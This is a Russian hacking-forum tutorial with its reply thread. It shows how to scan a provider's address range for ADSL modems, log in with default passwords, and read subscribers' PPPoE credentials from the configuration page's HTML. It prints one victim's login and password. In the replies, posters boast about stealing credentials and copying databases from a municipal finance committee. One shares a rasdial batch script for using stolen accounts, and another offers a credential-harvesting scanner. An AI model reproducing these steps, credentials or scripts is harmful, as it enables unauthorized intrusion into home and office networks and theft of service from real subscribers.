Взлом ADSL-модемов (или как достать забытый/чужой пароль, данный провайдером).(на примере ZyXEL OMNI ADSL LAN EE(Annex A) - роутер,NAT,фаер)

Предисловие:

Технология ADSL (асимметричная цифровая абонентская линия) наконец то добралась до самых отдалённых уголков России и продолжает распространяться стремительно. Всё больше и больше пользователей подключается к интернет через ADSL модем. Не буду вдаваться в подробности и описывать работу этой технологии, скажу своими словами так: DSL позволяет передать данные по обычным двум телефонным проводам с намного большей скоростью, чем обычный DIAL-UP модем (который передаёт данные в звуковом диапазоне - наверняка все слышали звук обычного модема при его работе). Так вот DSL (цифровая абонентская линия) - это технология которая позволяет передавать сигнал на более высоких частотах (поэтому и скорость выше) на той же паре проводов что и обычный низкочастотный сигнал слышимого диапазона. Для разделения высокочастотного и низкочастотного сигнала используются на обоих концах линии конечное оборудование - сплиттеры, далее у пользователя: один сигнал идёт на обычный телефон, второй на ADSL модем, на второй стороне также один сигнал идёт в телефонную сеть (АТС) второй провайдеру. В общем кто не знаком с ADSL, рекомендую почитать теорию http://ru.wikipedia.org/wiki/ADSL
Наш предмет пристального внимания - модем ADSL. Зачем его ломать спросите вы? Ну во первых как правило в него встроен NAT, файрвол и модем сам по себе уже является серъёзным препятствием на пути хакера до компьютера жертвы. Например заслали вы по почте троя или пробуюте получить шелл на компьютере жертвы с помощью 0day-сплоита для IE и у вас ничего не выходит, так как жертва находится за NAТ и(или) Фаером. А домашние сети с общим подключением в интернет, ведь в домашней локалке как правило все шары в свободном доступе и завладев одной машинкой в сети Вам будет легко получить доступ к остальным.
Здесь будет рассмотрем взлом ADSL- модемов с Ethernet подключением к компьютеру пользователя (есть ещё и USB - не рассматриваем тут).
Как и любое устройство, подключенное в интернет, ADSL модем имеет свой IP (он называется внешний IP, WAN-IP или реальный IP - как кому угодно), а также внутренний IP (LAN-IP) для вашей локалки (это шлюз в интернет в свойствах TCP/IP протокола на Вашем компе).
Между этими двумя интерфейсами WAN и LAN и располагается всё остальное (NAT,роутер, фаервол). Удалённое упрвление настройками ADSL (т.е. NAT`ом, роутером, фаерволом) модема доступно через разные протоколы (http, ftp, telnet и др.). Теперь самое интересное, по-умолчанию это удалённое управление у многих модемов доступно как и из локалки, так и из внешней сети. То есть, говоря другими словами ADSL-модем светит своими сервисами как наружу в интернет, так и в локалку. Многие пользователи (=ламеры) не особо утруждают себя настройкой ADSL модема для обеспечения своей безопасности и оставляют в настройке разрешение на управление модемом из вне, т. е. из интернет, кроме того, даже забывают (или просто не знают) изменить пароль для входа в конфигуратор ADSL-модема и оставляют его тоже дефалтным (по умолчанию)!

1. Подготовка.
а) нам потребуется любой сетевой сканер (для поиска встроенных в ADSL-модем WEB-серверов конфигуратора модема, я например для этих дел использую LanScope - не содержит ничего лишнего - это многопотоковый сканер сети, осуществляет мониторинг сети на наличие доступных ресурсов NetBios (Samba), FTP и HTTP, сканируя заданные диапазоны IP-адресов. Показывает права доступа к ресурсам: чтение, запись. Сканер ресурсов выполняет поиск по заданному имени ресурса, например, music, video и т.п. скачать можно тут http://lantricks.ru/ скачать сканнер LanScope (http://lantoolbox.com/download/lantricks/lanscope_setup.exe)
б) минимальные знания html и javascript.
в) прямые руки и светлая голова.

2. Поиск потенциальных жертв.
Сканируем подстеть прова на присутствие ADSL модемов. Как узнать подсеть провайдера - легко смотрите свой внешний IP и выбирайте диапазон такой же или близкий, например наш WAN IP ххх.ххх.241.20 берём задаём диапазон ххх.ххх.241.1-ххх.ххх.243.255. Через некоторое время в окне сканнера мы увидим сервисы web, ftp, шары. Нас интересуют web-конфигураторы ADSL-модемов.

3. Собственно сам взлом

Начинаем тыкаться браузером в каждый, попадаем на страницу авторизации входа в конфигуратор (там Вам выводится баннер с краткой инфой типа ADSL модем такой-то), введите пароль для входа. Мы пробуем пароль по умолчанию 1234, раз модем, два модем, ОПС на третий модем подошёл (во ламак попался один).
(прим. как ломать пароль для входа в конфигуратор читайте в следующих статьях, тут пока не рассмотрено)

У меня жертвой стал http://ххх.ххх.241.59:80
Вот баннер и страница входа Web-сервиса конфигуратора модема ADSL
скрин1 (http://lebed.ucoz.ru/images/screen1.png)
вбиваем 1234 в поле password и попадаем сюда:
скрин2 (http://lebed.ucoz.ru/images/screen2.png)
Тут нам говорят, что пасс по умалчанию 1234 и надо бы его вообще-то сменить (ну мы пока менять не будем, а то ламаку потом придётся сбрасывать модем и возится с его настройкой), по этому клацаем кнопку ignore и попадаем сюда:
скрин3 (http://lebed.ucoz.ru/images/screen3.png)
Лезем в мастер настройки модема (Wizard Setup)
скрин4 (http://lebed.ucoz.ru/images/screen4.png)
Логин уже видим, пасс скрыт за звёздочками
Это html-код этой страницы.

<html><head>
<meta http-equiv='content-type' content='text/html;charset=iso-8859-1'>
<title>Web Configurator</title>
<SCRIPT src="General.js"></SCRIPT>

<frameset cols="150,*" rows="*" frameborder="NO" border="0" bordercolor="#000000">
<frame src="Panel.html" name="panel" scrolling="NO" noresize frameborder="NO" bordercolor="#000000" marginwidth="0" marginheight="0">


<frameset cols="*" rows="78,*" frameborder="NO" border="0" bordercolor="#000000">

<frame src="Title.html" name="title" scrolling="NO" noresize frameborder="NO" marginwidth="0" marginheight="0">
<frame src="FirstPage.html" name="main" scrolling="AUTO" noresize frameborder="NO" marginwidth="0" marginheight="0">
</frameset></frameset><noframes>
<body>
</body></noframes>
</html>

Видим мало интересного и что страница состоит из фреймов. Глянем фреймы, например этот FirstPage.html,
скрин5 (http://lebed.ucoz.ru/images/screen6.png)
попадаем опять на первую страницу,
но уже на конкретный файл FirstPage.html, клацаем снова на Wizard Setup, строка в браузере имеет вид http://ххх.ххх.241.59:80/wzOthers.html,
скрин6 (http://lebed.ucoz.ru/images/screen7.png)
клацаем next - теперь в строке браузера страничка http://ххх.ххх.241.59:80/wzPPPOE.html,
скрин7 (http://lebed.ucoz.ru/images/screen8.png)
смотрим её исходник, вот он:

<html><head>
<meta http-equiv='content-type' content='text/html;charset=iso-8859-1'>
<title>Web Configurator</title>
<SCRIPT src="General.js"></SCRIPT>

<script language="JavaScript">
<!--
function doPPPoEIPAddr(form)
{
if ( form.radiobutton4[0].checked )
{
form.wzPPPOE_StaticIP.disabled = true;
}
else
{
form.wzPPPOE_StaticIP.disabled = false;
}
}

function PPPoEChkIdleTime(form)
{
if ( form.PPPoE_PPPoEVCKA[0].checked )
{
form.PPPoE_PPPoEVCIdleTime.disabled = false;
}
else
{
form.PPPoE_PPPoEVCIdleTime.disabled = true;
}
}

function PPPoEAOLWordChk(Word)
{
}

// -->
</script></head><body bgcolor="#ffffff" marginwidth="0" marginheight="0" onLoad="top.title.location='Title.html';">
<FORM METHOD="POST" ACTION="/Forms/wzPPPOE_1" name="ISPform">
<table width="100%" border="0" cellspacing="0" cellpadding="0" >
<tr>
<td width="2%">&nbsp;</td><td width="5%"></td><td width="93%">
<div align=left valign=top>
<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr>
<td colspan="4" class="NaviText">
<div align=left> Wizard Setup - ISP Parameters for Internet Access</div></td></tr>
<tr>
<td colspan="4">
<hr class="hrColor">
</td></tr> <tr>
<td colspan="2"> Service Name </td><td colspan="2">
<INPUT TYPE="TEXT" NAME="wzPPPOE_ServiceName" SIZE="30" MAXLENGTH="31" VALUE=""></td></tr> <tr>
<td colspan="2"> User Name </td><td colspan="2"> <INPUT TYPE="TEXT" NAME="wzPPPOE_UserName" SIZE="30" MAXLENGTH="70" VALUE="ll2498" onkeypress="chk_chtNumUserName(event)"></td></tr><tr>
<td colspan="2"> Password </td><td colspan="2">
<INPUT TYPE="PASSWORD" NAME="wzPPPOE_Password" SIZE="30" MAXLENGTH="70" VALUE="bukzajop" onBlur="PPPoEAOLWordChk(this.value)"></td></tr><tr>
<td colspan="4">&nbsp; </td></tr> <tr>
<td colspan="4" class="header2"> IP Address </td></tr><tr>
<td colspan="2"> </td><td colspan="2"> <INPUT TYPE="RADIO" NAME="radiobutton4" VALUE="wzPPPOE_DynIP" CHECKED onClick="doPPPoEIPAddr(this.form);">Obtain an IP Address Automatically </td></tr><tr>
<td colspan="2"> </td><td colspan="2"> <INPUT TYPE="RADIO" NAME="radiobutton4" VALUE="wzPPPOE_RadioStaticIP" onClick="doPPPoEIPAddr(this.form);">Static IP Address </td></tr><tr>
<td width="32"></td><td width="115">&nbsp;</td><td width="24">
</td><td width="479">
<INPUT TYPE="TEXT" NAME="wzPPPOE_StaticIP" SIZE="15" MAXLENGTH="15" VALUE="0.0.0.0" onBlur="checkIPFormat(this)"></td></tr> <tr>
<td colspan="4"></td></tr>
<tr>
<td colspan=4 class="header2">Connection</td></tr> <tr>
<td width="33"></td><td width="119">&nbsp;</td><td colspan="2">
<INPUT TYPE="RADIO" NAME="PPPoE_PPPoEVCKA" VALUE="0" onClick="PPPoEChkIdleTime(this.form);"> Connect on Demand: Max Idle Timeout <INPUT TYPE="TEXT" NAME="PPPoE_PPPoEVCIdleTime" SIZE="5" MAXLENGTH="5" VALUE="0" onkeypress="chk_num(event)">sec</td></tr>
<tr>
<td width="33"></td><td width="119">&nbsp;</td><td colspan="2"> <INPUT TYPE="RADIO" NAME="PPPoE_PPPoEVCKA" VALUE="1" CHECKED onClick="PPPoEChkIdleTime(this.form);"> Nailed-Up Connection</td></tr> <tr>
<td colspan=4 class="header2">&nbsp;</td></tr><tr>
<td colspan=4 class="header2">Network Address Translation</td></tr><tr>
<td colspan="2"></td><td colspan="2"> <SELECT NAME="wzPPPOE_NAT" SIZE="1"><OPTION VALUE=00000000>None
<OPTION VALUE=01000000 SELECTED>SUA Only
<OPTION VALUE=02000000>Full Feature
</SELECT></td></tr> <tr>
<td colspan="4">&nbsp;</td></tr>
<tr align=center valign=middle>
<td colspan="6" height="36">
<hr class="hrColor">
</td></tr> <tr>
<td colspan="4">
<div align=center> <INPUT TYPE="SUBMIT" NAME="wzPPPOEBack" VALUE="Back">&nbsp;&nbsp;&nbsp; <INPUT TYPE="SUBMIT" NAME="wzPPPOENext" VALUE="Next"></div></td></tr>
<tr>
<td colspan="6" height="10">&nbsp;</td></tr> </table></td></tr></table></form><script language="JavaScript">
<!--
doPPPoEIPAddr(document.forms[0]);
PPPoEChkIdleTime(document.forms[0]);
// -->
</script>

</body></html>


Вот она строка где сидит наш пароль:

<INPUT TYPE="PASSWORD" NAME="wzPPPOE_Password" SIZE="30" MAXLENGTH="70" VALUE="bukzajop" onBlur="PPPoEAOLWordChk(this.value)"></td></tr><tr>

Вот скриншот:
скрин8 (http://lebed.ucoz.ru/images/screen9.png)
Нетрудно догадаться что пасс это: "bukzajop", ну а логин от Вас в конфигураторе никто и не скрывает.
4.Заключение
Ну что тут сказать, кроме как ламаки есть, были и будут, а так же дырки в безопасности настройки модемов ADSL тоже. Нафига закрывать пасс от юзверя звёздочками, если его всё равно мона достать, посмотрев код html нужной страницы.
Ну а что делать в настройке ADSL-модема, я думаю объяснять не надо, можно сделать например переадресацию пакетов (настройка NAT) по всем протоколам и портам с внешнего IP на внутренний и ломать (исследовать на баги) сервисы на компе в локальной сети, а можно взять и переключить модем в режим bridge (мост - прим. Nova (http://forum.antichat.ru/member.php?u=17908) ), тем самым сделав модем прозрачным и перенести внешний IP на комп юзверя и затем сканить его компьютер сканнерами безопасности на предмет дыр в сетевых сервисах.
ссылки по теме:
Как мне помогли "Вспомнить" пароль на ][ (заставили думать головой) (http://forum.xakep.ru/m_797540/mpage_1/key_/tm.htm#797615) :D
А вот как помогли выбрать ADSL модем домой (тож там) (http://forum.xakep.ru/m_797117/mpage_1/key_/tm.htm#797944) :mad:

Важное дополнение к статье:
тут около 1195! моделей DSL-модемов и дефалтные акки к ним (http://phenoelit.de/dpl/dpl.html) зеркало (скачал к себе) (http://lebed.ucoz.ru/adslpass.html)

специально для Antichat (c) -=lebed=-

Ты хочешь сказать что в любом модеме с технологией aDSL есть NAT, фаер и устройства удалённого управления???

Ты хочешь сказать что в любом модеме с технологией aDSL есть NAT, фаер и устройства удалённого управления???
Ну не в любом наверно, а в любом современном, ИМХО (для дома и малого офиса, стоимостью от 900 руб. и выше) всё это есть, могу потрудится подготовить список моделей модемов если надо, а как там раньше было, х.е.з мож и не было этих сервисов.

пока подняась тема о модемах, ты не знаешь что сделать, когда берут телефон, который паралльно подключен к сплиттеру, то скорость падает, вплоть до дисконнекта?

пока подняась тема о модемах, ты не знаешь что сделать, когда берут телефон, который паралльно подключен к сплиттеру, то скорость падает, вплоть до дисконнекта?
Я дома сам вчера только ADSL подключил, на выход сплиттера тоже два телефона в параллель подключено: DECT Panasonic и совковый аналоговый гроб, пока с этой проблемой не сталкивался - только по DECT разговаривал. Сегодня попробую две трубки снять (и на втором тоже), как узнаю - отпишусь...

Если у тебя телефон висит на линии до сплиттера (т. е. фактически параллельно ему), то ИМХО такие проблемы могут быть. У меня два телефона висят уже после сплиттера параллельно друг другу (высокочастотного сигнала там уже нет).

Я задал вопрос о модемах потому что наш провайдер вешает всем одинаковые модели модемов какойто китайской фирмы -фирма Zte . Вот и интересуюсь =- по документации там нет ничего об удалённом администрировании модема.

пока подняась тема о модемах, ты не знаешь что сделать, когда берут телефон, который паралльно подключен к сплиттеру, то скорость падает, вплоть до дисконнекта?
Такая лабуда может возникать когда не все телефонные аппараты ты подключил через сплиттер или микрофильтр.
У меня такая фигня иногда возникает. Хер знает из-за чего.(Редко)

Гыыыыыыыы
Лол
У нормальных людей модем бриджом работает =)
Нах нат раздавать с модема ?
баян не в обиду автор =)

Гыыыыыыыы
Лол
У нормальных людей модем бриджом работает =)
Нах нат раздавать с модема ?
Модем работает взависимости от того кто как настроит, ИМХО это личное дело каждого выбирать нужный режим router или bridge.
Режим bridge нужен тогда, когда у тебя есть норм сервак, со всеми нужными сервисами (firewall, dhcp и т.п). А так если локалка маленькая (2-3 компа дома без элементарной защиты - фаер, антивирус) то ИМХО лучше оставить режим router, а если сервисы какого либо из компов надо засветить в ИНЕТ, тогда воспользоваться настройкой таблицы NAT. А то по твоему получается, что те кто оставляет режим роутер не нормальные чтоль? Кто как хочет так и делает. ИМХО для мало разбирающихся в различии режимов, режим роутер намного безопаснее, чем бридж (и не случайно он по умолчанию).
баян не в обиду автор- доказательства, плиз... (ИМХО на Ачате подобной статьи нет)

Причём тут сервак ???
даже если ты сам юзаеш модем на виндовой тачке то зачем его роутером делать смысл ???
Бридж это удобно подключаешся только когда тебе нада модем прозрачный... ip на твоей такчке не нада никуда лезть .... пихнул патчкорд и спи спокойно =)

А так запара с натом к примеру =)
Для меня из модема сделать что бридж что роутер пара секунд дела только бридж самое лучшие имхо !

2Автор ну и что что статьй нет всё равно БОЯН =)

Вы бы ещё чтобы хостинг безопасней сделать предложили бы его на джайлах делать =) а проще бы лобы чмоды раставить =)

Пытался провернуть выше изложенное на трех найденных простейшим гугл хакингом модемах.
Вердикт: пашет на 1 из 10 девайсов и то если повезет

развелкался со стрим-твшными пользователями - у них почти у всех модемы как и мой - 4 сетевых, юсби, вайфай, встроеный фаер и несколько режимов работы (нат, роутер, таблицы маршрутизатинга)
так вот, на форуме стримклаба запустил снифер на айпи адреса, посканил
где-то каждый 5-7 с дефолтными пассами )

2Автор ну и что что статьй нет всё равно БОЯН =)

Мля, ну БОЯН это не значит только потому, что ТЫ знал! А именно как раз потому "что статей нет!" это не БОЯН!
Вот сам глянь: http://www.google.ru/search?hl=ru&q=%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC+ADSL+%D0%BC%D0%BE %D0%B4%D0%B5%D0%BC%D0%BE%D0%B2&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=lang_ru

Инет так добывать весьма опасно т.к. узнать ваш телефон прову вообще не составит никакого труда. Например у нас вообще у всех один логин и пароль :) (сталобыть аутификация идёт по номеру телефона) Ради того чтобы поиграться с НАТом ломать тоже х.з. IPшники имеют свойство меняться (ищи это железо потом)
+ поставил, но в по сути Nova прав т.к. статья из раздела "взлом сетей" через сервисы оборудования :)

Патцы вот у меня такой ситуэйшн кароч типа надо мне номер телефона подделать для adsl и буду нахаляву юзать очень прошу, помогите очень хочеться за чужой счет в инете посидеть =)

---> даже если ты сам юзаеш модем на виндовой тачке то зачем его роутером делать смысл ???

Хотябы поэтому:

При скане виндового хоста нмапом операционка определяется как юникс (в моём случае) и как минимум 30% некорректной информации о портах.

И чем какие проблемы с натом при конфигурации интернет --> рутер\модем\фаер --> ras\dhcp\фаер --> свич --> сетка

2Azazel а зачем жыш лишние движения... ???

Да не спорю если конфигурять модем как роутер то это безопасней но бридж проще !

И ваще =)

Я высказал своё субьективное мнение по этому поводу !

2Azazel а зачем жыш лишние движения... ???

Да не спорю если конфигурять модем как роутер то это безопасней но бридж проще !

И ваще =)

Я высказал своё субьективное мнение по этому поводу !
Просто речь шла о чайниках, которые не то что не могут выставить режим роутера или бридж, а даже пароль для входа в конфигуратор сменить не могут (оставляют дефалтный). А режим "роутер" - у многих ADSL-модемов - по умолчанию как раз и стоит...

А что-же можно сделать с "ламерами", которые выставляют кастом пароль - можно-ли как-то выудить его?

брутфорс.

Брутфорс, боюсь, не решение... Есть ли в скриптах баги? Кто-нибудь исследовал уже этот вопрос?

Давно юзаю АДСЛ роуты самый "интересный" Huawey MT880. При взломе такого модема получаем много инфы. Сервисы- Telnet, FTP, Web. У кого какие идеи как этим можно воспользоваться. Вскоре выложу видео так возможно будет понятнее..

Брутфорс, боюсь, не решение... Есть ли в скриптах баги? Кто-нибудь исследовал уже этот вопрос?
Действительно Брутфорс тут не поможет, ды и в скриптах явных багов нет.

хех, я даже и не верил что такое возможно, но после скана 1000 компов моего прова я нашел 5 расшареных компов, один из них вебдизайнера, теперь у меня есть новый домен:)
А, и еще веб-интерфейс Dbox'а, попереключал чуваку каналы, вот он радовался.

эх, молодость... вспомнил как давным-давно, ничего не понимая в компах запустил свой первый скан.....

Кто-нибудь может подсказал как взломать пароль к конфигуратору DSL модема, конкретно к Huawei MT800 или может быть уже есть подборщик паролей? Или хоть намек на технологию перебора паролей чтобы можно было самому написать брутфорсер.

Пробуй admin admin (по-умолчанию), а так надо смотреть исходник страницы авторизации и искать, искать, искать самому, ИМХО, в этом случае без сниффера не обойтись...
Инфа по настройке модема Huawei MT800 (http://www.oris.orel.ru/instrukcii/HUAWEI_PPPoE.html) - на всякий случай...
Ещё ссылка по теме (http://forum.alser.kz/forum_posts.asp?TID=2111) - как видно, некоторые модели имеют технический пароль (подходит независимо от того какой стоит в данный момент, как раньше на вход в BIOS) - вообщем надо искать подробную техническую информацию от производителя или попробовать брут (Hydra)...

На днях тема вышла: Сканирую диапазоны ипи ну смотрю ламер - ну шары да и ftp -короче знакомая история... ну тырю пароли АДСЛ, захожу на серв статистики посмотреть с кем имею дело смотрю на месте фамилии\имени там "КОМИТЕТ ПО ФИНАНСАМ И НАЛОГАМ АДМИНИСТРАЦИИ *********** МУН ADSL2+". Щас юзаю поподробнее нового друга....

На днях тема вышла: Сканирую диапазоны ипи ну смотрю ламер - ну шары да и ftp -короче знакомая история... ну тырю пароли АДСЛ, захожу на серв статистики посмотреть с кем имею дело смотрю на месте фамилии\имени там "КОМИТЕТ ПО ФИНАНСАМ И НАЛОГАМ АДМИНИСТРАЦИИ *********** МУН ADSL2+". Щас юзаю поподробнее нового друга....
А пров не запалит, думаешь? Лезь в локалку дальше, там наверно много всего интересного...

А пров не запалит, думаешь? Лезь в локалку дальше, там наверно много всего интересного...
100% уверенности нету но вроде все чисто. Покапался не чего для меня лично интересного не нашёл, но на навсякий случай пару баз скопировал...

Полюбому существует технический пароль на мопеды где вот только про это инфу найти ?

Полюбому существует технический пароль на мопеды где вот только про это инфу найти ?
Полюбому есть....тока сам понимаешь если на другом конце провода не ламер то тебе это не поможет.

Полюбому существует технический пароль на мопеды где вот только про это инфу найти ?
Нету технических паролей, есть тока дефолтные и страшная кнопка резет у модема на заднице, которая этот пасс и выставляет.
А вообще у меня модем в режиме роутера неплохо пашет по схеме модем - свич - сеть. ;)

Нету технических паролей, есть тока дефолтные и страшная кнопка резет у модема на заднице, которая этот пасс и выставляет.
А вообще у меня модем в режиме роутера неплохо пашет по схеме модем - свич - сеть. ;)
Ну значит должен быть механизм сброса пароля в дефолтное состояние удалённо (посылкой специального запроса на опред. порт и сервис модема).

Пришла в голову такая идея если войти на модем возможно ли как-то поставить снифер?

Ну значит должен быть механизм сброса пароля в дефолтное состояние удалённо (посылкой специального запроса на опред. порт и сервис модема).
По идее тогда и все настройки модема сбросятся- все учетки....ды все.

Смысл в том что в настройках модема есть фишка "Remote Management Control"- доступ к удаленному управлению, по дефолту All, но если поставить Lan Only то модем не видать из инета, т.е. не о каком взломе пароля можно и не думать. (Я бы показал на примере но чот не могу скрины выложить).
http://77.45.128.12/ - типичный ламер admin\admin

Telnet Telnet traffic is blocked from the WAN to the LAN
FTP FTP traffic is blocked from the WAN to the LAN
TFTP TFTP traffic is blocked from the WAN to the LAN
Web Web traffic is blocked from the WAN to the LAN
Ping. Ping traffic is blocked from the WAN/LAN

Работе это не мешает, зато если человек надумает поднять свой сайт или ФТП определенно помешает.

ну единственное что могу добавить к статье, так это то, что просмативать пароли за звездочками удобнее Asterisk Password Reveal 3.0 (http://www.paqtool.com/product/pass/images/Pwddis.exe) Правда работает только с IE, но это не страшно, серийник (70171132831995863)

ну единственное что могу добавить к статье, так это то, что просмативать пароли за звездочками удобнее Asterisk Password Reveal 3.0 (http://www.paqtool.com/product/pass/images/Pwddis.exe) Правда работает только с IE, но это не страшно, серийник найти тоже не сложно ....
Вот возьми и найди серийник. Удобнее будет посмотреть исходник страницы, чем сливать эту программу, да к тому же искать серийник.

Rchie мля, ты каждый раз будешь копаться в исходниках ?
1 раз скачал и поставил и все, задержек 2 сек .... исходник 1.2 мег, много ?

Opera:
Ctrl+F3 - открыл исходник
Ctrl+F - поиск, вбиваем "Password", видим нужную строку.

P.S: Упаси Бог пользоваться IE

да ну его нах эти ява скрипты и т.д.... а эксплорер пару раз запустить - не страшно, в общем кому-как нравится )))) помоему так быстрее и никакой лишней мишуры...

Пацаны поверьте мне это не так принципиально. Ды и вообще я уже неделю юзаю модемы что чото новое найти ,а вы о пройденом.

С помощью инет паролей пользователей адсл ломаются аккауты на форуме CenterTelecomа.

eXtezy :D
Ты о чем?
Если о предыдущем посте, то это эмоции. Искал баги везде...Скачал его целиком --- Ну нету не чего....И тут такой касяк о котором я даже подумать не мог, до того простой. Это еще одно свидетельство того, что не надо останавливаться когда видишь "Официальный сайт...".

Провйдер-то тут причем? В корявом ПО от зухеля никто не виноват :) Да и тем-более, программисты непричем, в случае, когда юзвер не меняет дефаултовый пароль

Привет всем уменя есть много логенов м паролей на Adsl я начинаю подключаться под ними он пишит что такие пользователи не допустимы в этом домене что делать как замутить чтобы можно было юзать чужие логины?

Привет всем уменя есть много логенов м паролей на Adsl я начинаю подключаться под ними он пишит что такие пользователи не допустимы в этом домене что делать как замутить чтобы можно было юзать чужие логины?
Cкорее всего аккаунты прописаны к номеру телефона, или у них бабло закончилось ;)

скорей всего акаунты или на каждый логен свой мак адрес или ещо чтонибудь как что можно замутить кто знает?

Руками блин! На некоторых провайдерах нельзя зайти под другим логином, когда он уже сидит. Укради паролей 30, и сделай примерно такой батник

start /WAIT /MIN rasdial test alma2092019 password
start /WAIT /MIN rasdial test Boris password
<...>
start /WAIT /MIN rasdial test PayArmUser password

и будет тебе инет

Это что украсть кучу паролей с логинами и патом сидеть методом тыка подбирать который падайдет????

У меня тоже появилось пару вопросов по адсл .. У нас в сетке стоит роутер и к нему подрублено человека 4, я тоже "типо" подконектиться могу, т.е. качать со скоростью их мадема, но почему то страницы просматривать не могу ... Можно ли как нить "устранить" причину - система, на которой роутер - Linux

Возможно стоит фильтр ип адресов. А вообще надо подробнее излогать свою проблему, что бы тебе могли помочь.

ет все блин хорошо... только вот при юзаньи чужих акков есть такая интересная штучка как мак адреса, и они всегда прописываются в логах у прова. и по запросу из "откудава надо" будет вестись сирчь по логам, по твоему маку. угадайте, через сколько к вам в квартиру постучатся?
ps поговорил с админами ЦентрТелекома...

serega2net
Не кто и не спорит что легко засечь халявщика. Причём никто даже не будет запариваться нахождением мака т.к. проще посмотреть с какого порта выходили по данному логу, а как ты наверное знаешь, что у каждого пользователя адсл свой единственный и неповторимый порт по которому без проблем можно посмотреть телефон..(сл. адрес).
НО кто поднимит кипишь когда у него в месяц 4-10 гБ трафа а сл. (если он не совсем...) анлим и именно с такими пользователями и следует "водится".

У меня такая проблема... как только установил LanScope просканил диапазон определенных айпи на http ресурсы, все нормально. Потом начал сканить то комп вырубится с ошибкой, то еще че-нить. Когда сканит диапазон на адсл никуда не могу зайти - даже в свойства модема... странно. Кто-нить сталкивался с подобным?

Вчера столкнулся вот с чем: натравил на модем (его вебсервер) паука BlackWidow (прога, типа Телепорта) - получил через некоторое время отказ в обслуживании: ни интета, ни pinga шлюза, ни веб-сервера конфигуратора. Даже включение/выключение модема и компа не помогло. Выручил только сброс модема к заводским установкам.

Вчера столкнулся вот с чем: натравил на модем (его вебсервер) паука BlackWidow (прога, типа Телепорта) - получил через некоторое время отказ в обслуживании: ни интета, ни pinga шлюза, ни веб-сервера конфигуратора. Даже включение/выключение модема и компа не помогло. Выручил только сброс модема к заводским установкам.
Хы получился типа спецефицеский Ddos :D А что за мопед у тебя если не секрет?!

Хы получился типа спецефицеский Ddos :D А что за мопед у тебя если не секрет?!
Ага :D Да тот что в начале треда в статье.

P.S. А может там IDS есть встроенная, с внутреннего интерфейса наглухо закрылся, хотя по индикаторам всё ок было, т.е. с внешнего интерфейса наверно доступ был...

Не удивлюсь если это специфическая защита сервера. У меня была фигня не мог выйти по чужому логу (не конектица как будто не правильный) тока по своему сначала думал что из-за включённого режима Annex M (увеличивает отдачу с 1 до 3,5 Мбит/с) потом сбросил модем и все вроде нормально. Впоследствии поблема возникала не раз и все время выручал reset.

lebed а чо ты хотел BlackWidow сделать.. модем целеком увести:-)

с внешнего интерфейса наверно доступ был...

Дык проверить не долго :)

А может там Ids есть встроенная

Хмм да вроде твой мопед без наворотов всяких...

Не удивлюсь если это специфическая защита сервера

Хы а такое бывает :)

lebed а чо ты хотел BlackWidow сделать.. модем целеком увести:-)
Да скрипты, формы хотел достать оттуда, вообщем вытащить всё что можно хотел. Сломать хочу страницу авторизации на вход в web-конфигуратор.

Спайдером прогани тож может инфы полезной показать!..

А может баг? Кстати, где-то читал, что модем можно задосить по Snmp-протоколу...

Спайдером прогани тож может инфы полезной показать!..
Прогонял xSpider 7.5, На спайдере в даун не ушёл (на стандарных параметрах сканирования). Из дыр только три XSS возможны и SNMP - учётка говорит паблик...

что модем можно задосить по Snmp-протоколу...
Хы может так и получилось прога постучалась с подобными запросами и мопед упал :)))

Хы может так и получилось прога постучалась с подобными запросами и мопед упал :)))
Х.е.з. она вроде как только http запросы кидает.
Вот тред, где разбирается страница авторизации этого мопеда, там выложил исходник полностью, может ты что-нибудь найдёш?
http://forum.antichat.ru/thread34306.html

lebed ты прям заразил me своей идеей. Короче буду изучать ес чо найду сообщу ну и ты тож делись новой инфой.

В последней прошивки на зюкселах 660 вообще нет как таковой страницы авторизации для вход в web-конфигуратор. При вводе ип выскакивает стандартное виндовское окно подключения "пользователь\пароль". Короче как на хуавеях МТ880.

Хм, сканил больше не повторялось такого :) странно...

блин точно. также и в ВФ АП на админку не каждый пасс меняет имхо =)))

Есть прога, которая вытягивает логины и пассы!
Работает с ZyXEL Prestige 660RU-T1
написана мною! Могу поделится! вводишь диапазон ИП и ффсе!
Ждещь свои пароли! Конечно от тех юзверей, которые забыли поменять свой пасс! :)
Кого интересует стучите: 6130113

Есть прога, которая вытягивает логины и пассы!
Работает с ZyXEL Prestige 660RU-T1
написана мною! Могу поделится! вводишь диапазон ИП и ффсе!
Ждещь свои пароли! Конечно от тех юзверей, которые забыли поменять свой пасс! :)
Кого интересует стучите: 6130113
Давай на тест: стукни на тату на моей аве которая .(DES)..

Кстати хочу еще добавить туда перебор по словарю, но наверно опционально, потому как если сканить большой диапазон и так времени уйдет немерено, а тут еще и перебор :) Потому думаю лучше будет опционально включить перебор, для определенного ип, или группы. Вы как считаете?
Вот скрин: http://img83.imageshack.us/my.php?image=prestige660rut1gr1.jpg

А возможна ли установка прокси внутрь adsl модема?
Ведь там используется урезанная версия линукса (bisybox - это для d-link модемов)...
Функция socks реализована в прошивках для d-link модемов, но требуется перепрошивка, осуществить которую удалённо невозможно...
Внутри системы отсутствуют perl и gcc...скомпиленные на других системах бинарники у меня отказались работать (связь с модемом осуществлялась через телнет)
Ну а если была бы возможность установить туда vpn сервер, то было бы вообще супер...Ведь доступ к модему осуществляется с рутовыми правами (полная очистка логов)+халявный интернет
Есть у кого какие-нибуть соображения по этому поводу?

А возможна ли установка прокси внутрь adsl модема?
Ведь там используется урезанная версия линукса (bisybox - это для d-link модемов)...
Функция socks реализована в прошивках для d-link модемов, но требуется перепрошивка, осуществить которую удалённо невозможно...
Внутри системы отсутствуют perl и gcc...скомпиленные на других системах бинарники у меня отказались работать (связь с модемом осуществлялась через телнет)
Ну а если была бы возможность установить туда vpn сервер, то было бы вообще супер...Ведь доступ к модему осуществляется с рутовыми правами (полная очистка логов)+халявный интернет
Есть у кого какие-нибуть соображения по этому поводу?
Конечно было бы здорово, если бы это было возможно. На счёт прокси и VPN - демонов. А вот поставить туда HTML+java анонимайзер, это имхо ближе к реальности... тут тоже халявный интернет+анонимность...

Важное дополнение к статье:
тут около 1195! моделей DSL-модемов и дефалтные акки к ним (http://phenoelit.de/dpl/dpl.html) зеркало (скачал к себе) (http://lebed.ucoz.ru/adslpass.html)

